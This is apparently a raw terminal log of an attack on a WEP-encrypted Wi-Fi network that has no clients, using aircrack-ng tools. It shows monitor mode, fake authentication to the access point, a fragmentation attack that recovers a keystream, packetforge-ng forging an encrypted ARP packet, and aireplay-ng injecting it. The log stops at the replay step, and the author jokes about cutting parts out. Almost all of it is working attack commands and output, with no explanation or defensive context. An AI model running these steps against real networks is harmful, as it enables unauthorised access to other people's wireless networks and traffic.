# airmon-ng start wlan0
# iwconfig
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
# airodump-ng --channel 10 -w wep-no-sta mon
# aireplay-ng -1 0 -e <essid> -b 55:44:33:22:11:00 mon0
waiting for beacon frame (ESSID: <essid>) on channel 10
Found BSSID "55:44:33:22:11:00" to given ESSID "<essid>".
05:26:41 Sending Authentication Request (Open System) [ACK]
05:26:41 Authentication successful
05:26:41 Sending Association Request [ACK]
05:26:41 Association successful :-) (AID: 1)
# aireplay-ng -5 -b 55:44:33:22:11:00 -h 00:11:22:33:44:55 mon0
04:54:41 Waiting for beacon frame (BSSID: 55:44:33:22:11:00) on channel 10
04:54:41 Waiting for a data packet...
Read 725 packets...
Size: 344, FromDS: 1, ToDS: 0 (WEP)
BSSID = 55:44:33:22:11:00
Dest. MAC = XX:XX:XX:XX:XX:XX
Source MAC = 55:44:33:22:11:00
//--CUT FOR OWN SAFETY, YOU KNOW GUYS SAFETY FIRST :)
Use this packet ? y
Saving chosen packet in replay_src-0528-045527.cap
04:59:19 Data packet found!
04:59:19 Sending fragmented packet
04:59:19 Got RELAYED packet!!
04:59:19 Trying to get 384 bytes of a keystream
04:59:19 Got RELAYED packet!!
04:59:19 Trying to get 1500 bytes of a keystream
04:59:19 Got RELAYED packet!!
Saving keystream in fragment-0528-045919.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
# packetforge-ng -0 -a 55:44:33:22:11:00 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0528-045919.xor -w arpforge
Wrote packet to: arpforge
# tcpdump -e -vvv -n -s0 -r arpforge
reading from file arpforge, link-type IEEE802_11 (802.11)
05:55:31.757099 WEP Encrypted 258us BSSID:55:44:33:22:11:00 SA:00:11:22:33:44:55 DA:ff:ff:ff:ff:ff:ff Data IV:96f08 Pad 0 KeyID 0
# aireplay-ng -2 -r arpforge mon0
No source MAC (-h) specified. Using the device MAC (00:11:22:33:44:55)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 55:44:33:22:11:00
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:11:22:33:44:55
//--CUT YOU KNOW WHY !!!
Use this packet ? y